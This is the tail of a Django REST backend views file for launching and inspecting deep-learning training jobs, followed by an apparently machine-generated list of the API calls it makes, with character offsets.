hyperparams[p.property_id.name] = p.default_value
# Load default values for those properties not in props_allowed
props_general = models.Property.objects.all()
for p in props_general:
if hyperparams.get(p.name) is None:
hyperparams[p.name] = p.default
# Overwrite hyperparams with ones provided by the user
props = serializer.data['properties']
for p in props:
ts = models.TrainingSetting()
# Get the property by name
name = p['name']
name = [name, name.replace('_', ' ')]
queryset = models.Property.objects.filter(Q(name__icontains=name[0]) | Q(name__icontains=name[1]))
if len(queryset) == 0:
# Property does not exist, delete the weight and its associated properties (cascade)
weight.delete()
error = {"Error": f"Property `{p['name']}` does not exist"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
property = queryset[0]
ts.property_id = property
ts.modelweights_id = weight
ts.value = str(p['value'])
ts.save()
hyperparams[property.name] = ts.value
config = nn_settings(modelweight=weight, hyperparams=hyperparams)
if not config:
return Response({"Error": "Properties error"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# Differentiate the task and start training
if task_name == 'classification':
celery_id = classification.classificate.delay(config)
# celery_id = classification.classificate(config)
elif task_name == 'segmentation':
celery_id = segmentation.segment.delay(config)
# celery_id = segmentation.segment(config)
else:
return Response({'error': 'error on task'}, status=status.HTTP_400_BAD_REQUEST)
weight = models.ModelWeights.objects.get(id=weight.id)
weight.celery_id = celery_id.id
weight.save()
# todo what if project already has a modelweight?
# Training started, store the training in project
project.modelweights_id = weight
project.save()
response = {
"result": "ok",
"process_id": celery_id.id,
"weight_id": weight.id
}
return Response(response, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TrainingSettingViewSet(BAMixins.ParamListModelMixin,
viewsets.GenericViewSet):
queryset = models.TrainingSetting.objects.all()
serializer_class = serializers.TrainingSettingSerializer
params = ['modelweights_id', 'property_id']
def get_queryset(self):
modelweights_id = self.request.query_params.get('modelweights_id')
property_id = self.request.query_params.get('property_id')
self.queryset = models.TrainingSetting.objects.filter(modelweights_id=modelweights_id, property_id=property_id)
return self.queryset
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('modelweights_id', openapi.IN_QUERY, "Integer representing a ModelWeights",
required=True, type=openapi.TYPE_INTEGER),
openapi.Parameter('property_id', openapi.IN_QUERY, "Integer representing a Property",
required=True, type=openapi.TYPE_INTEGER)]
)
def list(self, request, *args, **kwargs):
"""Returns settings used for a training
This API returns the value used for a property in a specific training (a modelweights).
It requires a `modelweights_id`, indicating a training process, and a `property_id`.
"""
return super().list(request, *args, **kwargs)
| [
"backend_app.models.Model.objects.filter",
"backend_app.models.Project.objects.filter",
"numpy.trunc",
"drf_yasg.utils.swagger_auto_schema",
"backend_app.models.Project.objects.get",
"yaml.load",
"backend_app.models.AllowedProperty.objects.all",
"backend_app.models.TrainingSetting",
"backend_app.mod... | [((816, 852), 'backend_app.models.AllowedProperty.objects.all', 'models.AllowedProperty.objects.all', ([], {}), '()\n', (850, 852), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((2601, 2653), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'is_single_image': '(False)'}), '(is_single_image=False)\n', (2630, 2653), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((3624, 3693), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'responses': 'swagger.DatasetViewSet_create_response'}), '(responses=swagger.DatasetViewSet_create_response)\n', (3643, 3693), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((5697, 5812), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.InferenceSerializer', 'responses': 'swagger.inferences_post_responses'}), '(request_body=serializers.InferenceSerializer, responses\n =swagger.inferences_post_responses)\n', (5716, 5812), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((6373, 6493), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.InferenceSingleSerializer', 'responses': 'swagger.inferences_post_responses'}), '(request_body=serializers.InferenceSingleSerializer,\n responses=swagger.inferences_post_responses)\n', (6392, 6493), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((8546, 8572), 'backend_app.models.Model.objects.all', 'models.Model.objects.all', ([], {}), '()\n', (8570, 8572), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((9741, 9774), 'backend_app.models.ModelWeights.objects.all', 'models.ModelWeights.objects.all', ([], {}), '()\n', (9772, 9774), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((12362, 12399), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'auto_schema': 'None'}), '(auto_schema=None)\n', (12381, 12399), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((15424, 15452), 'backend_app.models.Project.objects.all', 'models.Project.objects.all', ([], {}), '()\n', (15450, 15452), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16072, 16141), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'responses': 'swagger.ProjectViewSet_create_response'}), '(responses=swagger.ProjectViewSet_create_response)\n', (16091, 16141), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((17116, 17153), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'auto_schema': 'None'}), '(auto_schema=None)\n', (17135, 17153), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((17433, 17462), 'backend_app.models.Property.objects.all', 'models.Property.objects.all', ([], {}), '()\n', (17460, 17462), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((20989, 21112), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.StopProcessSerializer', 'responses': 'swagger.StopProcessViewSet_post_response'}), '(request_body=serializers.StopProcessSerializer,\n responses=swagger.StopProcessViewSet_post_response)\n', (21008, 21112), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((23022, 23047), 'backend_app.models.Task.objects.all', 'models.Task.objects.all', ([], {}), '()\n', (23045, 23047), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((23424, 23536), 'drf_yasg.utils.swagger_auto_schema', 'swagger_auto_schema', ([], {'request_body': 'serializers.TrainSerializer', 'responses': 'swagger.TrainViewSet_post_response'}), '(request_body=serializers.TrainSerializer, responses=\n swagger.TrainViewSet_post_response)\n', (23443, 23536), False, 'from drf_yasg.utils import swagger_auto_schema\n'), ((29642, 29678), 'backend_app.models.TrainingSetting.objects.all', 'models.TrainingSetting.objects.all', ([], {}), '()\n', (29676, 29678), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((1136, 1222), 'backend_app.models.AllowedProperty.objects.filter', 'models.AllowedProperty.objects.filter', ([], {'model_id': 'model_id', 'property_id': 'property_id'}), '(model_id=model_id, property_id=\n property_id)\n', (1173, 1222), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((5578, 5650), 'rest_framework.response.Response', 'Response', (["{'error': 'URL malformed'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)\n", (5586, 5650), False, 'from rest_framework.response import Response\n'), ((6106, 6156), 'backend_app.serializers.InferenceSerializer', 'serializers.InferenceSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (6137, 6156), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((6257, 6320), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (6265, 6320), False, 'from rest_framework.response import Response\n'), ((6845, 6901), 'backend_app.serializers.InferenceSingleSerializer', 'serializers.InferenceSingleSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (6882, 6901), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((8378, 8441), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (8386, 8441), False, 'from rest_framework.response import Response\n'), ((12060, 12123), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (12068, 12123), False, 'from rest_framework.response import Response\n'), ((13714, 13767), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (13745, 13767), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((15130, 15175), 'rest_framework.response.Response', 'Response', (['response'], {'status': 'status.HTTP_200_OK'}), '(response, status=status.HTTP_200_OK)\n', (15138, 15175), False, 'from rest_framework.response import Response\n'), ((16617, 16674), 'backend_app.serializers.ProjectSerializer', 'serializers.ProjectSerializer', (['project'], {'data': 'request.data'}), '(project, data=request.data)\n', (16646, 16674), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16831, 16894), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (16839, 16894), False, 'from rest_framework.response import Response\n'), ((20895, 20940), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_200_OK'}), '(data=res, status=status.HTTP_200_OK)\n', (20903, 20940), False, 'from rest_framework.response import Response\n'), ((21383, 21435), 'backend_app.serializers.StopProcessSerializer', 'serializers.StopProcessSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (21416, 21435), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22856, 22919), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (22864, 22919), False, 'from rest_framework.response import Response\n'), ((23969, 24015), 'backend_app.serializers.TrainSerializer', 'serializers.TrainSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (23996, 24015), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((29447, 29510), 'rest_framework.response.Response', 'Response', (['serializer.errors'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n', (29455, 29510), False, 'from rest_framework.response import Response\n'), ((29983, 30082), 'backend_app.models.TrainingSetting.objects.filter', 'models.TrainingSetting.objects.filter', ([], {'modelweights_id': 'modelweights_id', 'property_id': 'property_id'}), '(modelweights_id=modelweights_id,\n property_id=property_id)\n', (30020, 30082), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((2843, 2912), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'task_id': 'task_id', 'is_single_image': '(False)'}), '(task_id=task_id, is_single_image=False)\n', (2872, 2912), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((4207, 4315), 'rest_framework.response.Response', 'Response', (["{'error': 'Validation error. Request data is malformed.'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'Validation error. Request data is malformed.'}, status=\n status.HTTP_400_BAD_REQUEST)\n", (4215, 4315), False, 'from rest_framework.response import Response\n'), ((4649, 4757), 'rest_framework.response.Response', 'Response', (["{'error': f'The dataset `{dataset_name}` already exists'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': f'The dataset `{dataset_name}` already exists'}, status=\n status.HTTP_400_BAD_REQUEST)\n", (4657, 4757), False, 'from rest_framework.response import Response\n'), ((4810, 4849), 'requests.get', 'requests.get', (['url'], {'allow_redirects': '(True)'}), '(url, allow_redirects=True)\n', (4822, 4849), False, 'import requests\n'), ((6211, 6241), 'backend_app.utils.do_inference', 'utils.do_inference', (['serializer'], {}), '(serializer)\n', (6229, 6241), False, 'from backend_app import utils\n'), ((7540, 7636), 'backend_app.models.Dataset', 'models.Dataset', ([], {'name': 'f"""single-image-dataset"""', 'task_id': 'task_id', 'path': '""""""', 'is_single_image': '(True)'}), "(name=f'single-image-dataset', task_id=task_id, path='',\n is_single_image=True)\n", (7554, 7636), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((8332, 8362), 'backend_app.utils.do_inference', 'utils.do_inference', (['serializer'], {}), '(serializer)\n', (8350, 8362), False, 'from backend_app import utils\n'), ((8760, 8804), 'backend_app.models.Model.objects.filter', 'models.Model.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (8787, 8804), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((10015, 10068), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'model_id': 'model_id'}), '(model_id=model_id)\n', (10049, 10068), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((11071, 11109), 'backend_app.models.ModelWeights.objects.get', 'models.ModelWeights.objects.get', ([], {'id': 'id'}), '(id=id)\n', (11102, 11109), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((11525, 11581), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (11533, 11581), False, 'from rest_framework.response import Response\n'), ((11803, 11863), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'model_id': 'weight.model_id'}), '(model_id=weight.model_id)\n', (11837, 11863), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((12019, 12044), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (12027, 12044), False, 'from rest_framework.response import Response\n'), ((12622, 12651), 'numpy.trunc', 'np.trunc', (['(values * 10 ** decs)'], {}), '(values * 10 ** decs)\n', (12630, 12651), True, 'import numpy as np\n'), ((13576, 13632), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (13584, 13632), False, 'from rest_framework.response import Response\n'), ((13868, 13979), 'rest_framework.response.Response', 'Response', (["{'result': 'Process stopped before finishing or non existing.'}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'result': 'Process stopped before finishing or non existing.'},\n status=status.HTTP_404_NOT_FOUND)\n", (13876, 13979), False, 'from rest_framework.response import Response\n'), ((14080, 14186), 'rest_framework.response.Response', 'Response', (["{'result': 'Process in execution. Try later for output results.'}"], {'status': 'status.HTTP_200_OK'}), "({'result': 'Process in execution. Try later for output results.'},\n status=status.HTTP_200_OK)\n", (14088, 14186), False, 'from rest_framework.response import Response\n'), ((14340, 14436), 'rest_framework.response.Response', 'Response', (["{'result': 'Output file not found'}"], {'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), "({'result': 'Output file not found'}, status=status.\n HTTP_500_INTERNAL_SERVER_ERROR)\n", (14348, 14436), False, 'from rest_framework.response import Response\n'), ((14455, 14501), 'os.path.join', 'opjoin', (['settings.OUTPUTS_DIR', 'infer.outputfile'], {}), '(settings.OUTPUTS_DIR, infer.outputfile)\n', (14461, 14501), True, 'from os.path import join as opjoin\n'), ((15566, 15599), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': 'id'}), '(id=id)\n', (15592, 15599), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((16539, 16595), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (16547, 16595), False, 'from rest_framework.response import Response\n'), ((19397, 19453), 'rest_framework.response.Response', 'Response', ([], {'data': 'error', 'status': 'status.HTTP_400_BAD_REQUEST'}), '(data=error, status=status.HTTP_400_BAD_REQUEST)\n', (19405, 19453), False, 'from rest_framework.response import Response\n'), ((21547, 21603), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (21581, 21603), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((21624, 21677), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (21655, 21677), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22795, 22840), 'rest_framework.response.Response', 'Response', (['response'], {'status': 'status.HTTP_200_OK'}), '(response, status=status.HTTP_200_OK)\n', (22803, 22840), False, 'from rest_framework.response import Response\n'), ((24131, 24152), 'backend_app.models.ModelWeights', 'models.ModelWeights', ([], {}), '()\n', (24150, 24152), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((25391, 25451), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': "serializer.data['project_id']"}), "(id=serializer.data['project_id'])\n", (25417, 25451), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26199, 26237), 'os.path.join', 'opjoin', (['settings.TRAINING_DIR', '"""ckpts"""'], {}), "(settings.TRAINING_DIR, 'ckpts')\n", (26205, 26237), True, 'from os.path import join as opjoin\n'), ((26630, 26696), 'backend_app.models.AllowedProperty.objects.filter', 'models.AllowedProperty.objects.filter', ([], {'model_id': 'weight.model_id_id'}), '(model_id=weight.model_id_id)\n', (26667, 26696), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26942, 26971), 'backend_app.models.Property.objects.all', 'models.Property.objects.all', ([], {}), '()\n', (26969, 26971), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((28158, 28214), 'deeplearning.utils.nn_settings', 'nn_settings', ([], {'modelweight': 'weight', 'hyperparams': 'hyperparams'}), '(modelweight=weight, hyperparams=hyperparams)\n', (28169, 28214), False, 'from deeplearning.utils import nn_settings\n'), ((28894, 28939), 'backend_app.models.ModelWeights.objects.get', 'models.ModelWeights.objects.get', ([], {'id': 'weight.id'}), '(id=weight.id)\n', (28925, 28939), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((29381, 29431), 'rest_framework.response.Response', 'Response', (['response'], {'status': 'status.HTTP_201_CREATED'}), '(response, status=status.HTTP_201_CREATED)\n', (29389, 29431), False, 'from rest_framework.response import Response\n'), ((1301, 1426), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""model_id"""', 'openapi.IN_QUERY', '"""Integer representing a model"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('model_id', openapi.IN_QUERY,\n 'Integer representing a model', required=True, type=openapi.TYPE_INTEGER)\n", (1318, 1426), False, 'from drf_yasg import openapi\n'), ((1496, 1632), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""property_id"""', 'openapi.IN_QUERY', '"""Integer representing a property"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('property_id', openapi.IN_QUERY,\n 'Integer representing a property', required=True, type=openapi.TYPE_INTEGER\n )\n", (1513, 1632), False, 'from drf_yasg import openapi\n'), ((3073, 3166), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""task_id"""', 'openapi.IN_QUERY'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('task_id', openapi.IN_QUERY, type=openapi.TYPE_INTEGER,\n required=False)\n", (3090, 3166), False, 'from drf_yasg import openapi\n'), ((4568, 4619), 'pathlib.Path', 'Path', (['f"""{settings.DATASETS_DIR}/{dataset_name}.yml"""'], {}), "(f'{settings.DATASETS_DIR}/{dataset_name}.yml')\n", (4572, 4619), False, 'from pathlib import Path\n'), ((4918, 4962), 'yaml.load', 'yaml.load', (['r.content'], {'Loader': 'yaml.FullLoader'}), '(r.content, Loader=yaml.FullLoader)\n', (4927, 4962), False, 'import yaml\n'), ((5315, 5389), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED', 'headers': 'headers'}), '(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n', (5323, 5389), False, 'from rest_framework.response import Response\n'), ((5490, 5562), 'rest_framework.response.Response', 'Response', (["{'error': 'URL malformed'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)\n", (5498, 5562), False, 'from rest_framework.response import Response\n'), ((7087, 7128), 'backend_app.models.Project.objects.get', 'models.Project.objects.get', ([], {'id': 'project_id'}), '(id=project_id)\n', (7113, 7128), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((7702, 7750), 'yaml.load', 'yaml.load', (['dummy_dataset'], {'Loader': 'yaml.FullLoader'}), '(dummy_dataset, Loader=yaml.FullLoader)\n', (7711, 7750), False, 'import yaml\n'), ((8057, 8123), 'yaml.dump', 'yaml.dump', (['yaml_content', 'f'], {'Dumper': 'utils.MyDumper', 'sort_keys': '(False)'}), '(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)\n', (8066, 8123), False, 'import yaml\n'), ((8888, 9037), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""task_id"""', 'openapi.IN_QUERY', '"""Integer for filtering the models based on task."""'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('task_id', openapi.IN_QUERY,\n 'Integer for filtering the models based on task.', type=openapi.\n TYPE_INTEGER, required=False)\n", (8905, 9037), False, 'from drf_yasg import openapi\n'), ((10237, 10393), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""model_id"""', 'openapi.IN_QUERY', '"""Return the modelweights obtained on `model_id` model."""'], {'type': 'openapi.TYPE_INTEGER', 'required': '(False)'}), "('model_id', openapi.IN_QUERY,\n 'Return the modelweights obtained on `model_id` model.', type=openapi.\n TYPE_INTEGER, required=False)\n", (10254, 10393), False, 'from drf_yasg import openapi\n'), ((14016, 14039), 'celery.result.AsyncResult', 'AsyncResult', (['process_id'], {}), '(process_id)\n', (14027, 14039), False, 'from celery.result import AsyncResult\n'), ((14272, 14318), 'os.path.join', 'opjoin', (['settings.OUTPUTS_DIR', 'infer.outputfile'], {}), '(settings.OUTPUTS_DIR, infer.outputfile)\n', (14278, 14318), True, 'from os.path import join as opjoin\n'), ((12721, 12906), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""process_id"""', 'openapi.IN_QUERY', '"""Pass a required UUID representing a finished process."""'], {'type': 'openapi.TYPE_STRING', 'format': 'openapi.FORMAT_UUID', 'required': '(False)'}), "('process_id', openapi.IN_QUERY,\n 'Pass a required UUID representing a finished process.', type=openapi.\n TYPE_STRING, format=openapi.FORMAT_UUID, required=False)\n", (12738, 12906), False, 'from drf_yasg import openapi\n'), ((19531, 19587), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19565, 19587), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((20071, 20123), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_404_NOT_FOUND'}), '(data=res, status=status.HTTP_404_NOT_FOUND)\n', (20079, 20123), False, 'from rest_framework.response import Response\n'), ((20422, 20486), 'rest_framework.response.Response', 'Response', ([], {'data': 'res', 'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), '(data=res, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n', (20430, 20486), False, 'from rest_framework.response import Response\n'), ((18527, 18684), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""process_id"""', 'openapi.IN_QUERY', '"""UUID representing a process"""'], {'required': '(True)', 'type': 'openapi.TYPE_STRING', 'format': 'openapi.FORMAT_UUID'}), "('process_id', openapi.IN_QUERY,\n 'UUID representing a process', required=True, type=openapi.TYPE_STRING,\n format=openapi.FORMAT_UUID)\n", (18544, 18684), False, 'from drf_yasg import openapi\n'), ((21877, 21979), 'rest_framework.response.Response', 'Response', (["{'result': 'Process already stopped or non existing'}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'result': 'Process already stopped or non existing'}, status=\n status.HTTP_404_NOT_FOUND)\n", (21885, 21979), False, 'from rest_framework.response import Response\n'), ((24504, 24555), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (24512, 24555), False, 'from rest_framework.response import Response\n'), ((24750, 24801), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (24758, 24801), False, 'from rest_framework.response import Response\n'), ((25022, 25073), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (25030, 25073), False, 'from rest_framework.response import Response\n'), ((25316, 25367), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (25324, 25367), False, 'from rest_framework.response import Response\n'), ((27279, 27303), 'backend_app.models.TrainingSetting', 'models.TrainingSetting', ([], {}), '()\n', (27301, 27303), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((28265, 28355), 'rest_framework.response.Response', 'Response', (["{'Error': 'Properties error'}"], {'status': 'status.HTTP_500_INTERNAL_SERVER_ERROR'}), "({'Error': 'Properties error'}, status=status.\n HTTP_500_INTERNAL_SERVER_ERROR)\n", (28273, 28355), False, 'from rest_framework.response import Response\n'), ((28482, 28523), 'deeplearning.tasks.classification.classificate.delay', 'classification.classificate.delay', (['config'], {}), '(config)\n', (28515, 28523), False, 'from deeplearning.tasks import classification, segmentation\n'), ((30162, 30306), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""modelweights_id"""', 'openapi.IN_QUERY', '"""Integer representing a ModelWeights"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('modelweights_id', openapi.IN_QUERY,\n 'Integer representing a ModelWeights', required=True, type=openapi.\n TYPE_INTEGER)\n", (30179, 30306), False, 'from drf_yasg import openapi\n'), ((30371, 30507), 'drf_yasg.openapi.Parameter', 'openapi.Parameter', (['"""property_id"""', 'openapi.IN_QUERY', '"""Integer representing a Property"""'], {'required': '(True)', 'type': 'openapi.TYPE_INTEGER'}), "('property_id', openapi.IN_QUERY,\n 'Integer representing a Property', required=True, type=openapi.TYPE_INTEGER\n )\n", (30388, 30507), False, 'from drf_yasg import openapi\n'), ((5067, 5133), 'yaml.dump', 'yaml.dump', (['yaml_content', 'f'], {'Dumper': 'utils.MyDumper', 'sort_keys': '(False)'}), '(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)\n', (5076, 5133), False, 'import yaml\n'), ((7866, 7951), 'rest_framework.response.Response', 'Response', (["{'error': 'Error in YAML parsing'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'Error in YAML parsing'}, status=status.HTTP_400_BAD_REQUEST\n )\n", (7874, 7951), False, 'from rest_framework.response import Response\n'), ((17783, 17809), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[0]'}), '(name__icontains=name[0])\n', (17784, 17809), False, 'from django.db.models import Q\n'), ((17812, 17838), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[1]'}), '(name__icontains=name[1])\n', (17813, 17838), False, 'from django.db.models import Q\n'), ((19658, 19714), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19692, 19714), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((19736, 19789), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19767, 19789), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22105, 22175), 'backend.celery_app.control.revoke', 'celery_app.control.revoke', (['celery_id'], {'terminate': '(True)', 'signal': '"""SIGUSR1"""'}), "(celery_id, terminate=True, signal='SIGUSR1')\n", (22130, 22175), False, 'from backend import celery_app, settings\n'), ((26063, 26114), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (26071, 26114), False, 'from rest_framework.response import Response\n'), ((27836, 27887), 'rest_framework.response.Response', 'Response', (['error'], {'status': 'status.HTTP_400_BAD_REQUEST'}), '(error, status=status.HTTP_400_BAD_REQUEST)\n', (27844, 27887), False, 'from rest_framework.response import Response\n'), ((28664, 28698), 'deeplearning.tasks.segmentation.segment.delay', 'segmentation.segment.delay', (['config'], {}), '(config)\n', (28690, 28698), False, 'from deeplearning.tasks import classification, segmentation\n'), ((28799, 28871), 'rest_framework.response.Response', 'Response', (["{'error': 'error on task'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'error': 'error on task'}, status=status.HTTP_400_BAD_REQUEST)\n", (28807, 28871), False, 'from rest_framework.response import Response\n'), ((19861, 19914), 'backend_app.models.Inference.objects.filter', 'models.Inference.objects.filter', ([], {'celery_id': 'process_id'}), '(celery_id=process_id)\n', (19892, 19914), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((22502, 22572), 'backend.celery_app.control.revoke', 'celery_app.control.revoke', (['celery_id'], {'terminate': '(True)', 'signal': '"""SIGUSR1"""'}), "(celery_id, terminate=True, signal='SIGUSR1')\n", (22527, 22572), False, 'from backend import celery_app, settings\n'), ((24299, 24376), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'id': 'weight.dataset_id_id', 'is_single_image': '(False)'}), '(id=weight.dataset_id_id, is_single_image=False)\n', (24328, 24376), 